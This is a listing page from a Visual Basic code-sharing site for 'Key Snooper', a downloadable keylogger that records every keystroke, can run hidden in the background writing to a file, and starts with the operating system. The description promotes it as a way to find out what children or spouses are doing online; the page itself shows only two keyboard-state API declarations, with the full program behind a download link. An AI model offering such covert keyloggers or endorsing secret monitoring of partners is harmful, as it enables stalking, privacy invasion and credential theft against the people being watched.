VBcoders Browse New Submit Contact Sign In

No account? Register free

Forgot password?

Key Snooper

Lewis E. Moten III  (9 Submissions)   Complete Applications   Visual Basic 5.0   Intermediate   Wed 3rd February 2021

Monitor any key typed on the keyboard. Use the GUI to test, or supply a file name and run in the background. Uses GetAsyncKeyState API and GetKeyState. Great for finding out what children or spouses are doing on the internet. Instructions included to start the program when the Operating system starts.

API Declarations
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

Rate Key Snooper (9(9 Vote))

Download Key Snooper

Key Snooper Comments

No comments yet — be the first to post one!

Post a Comment

0/1000 characters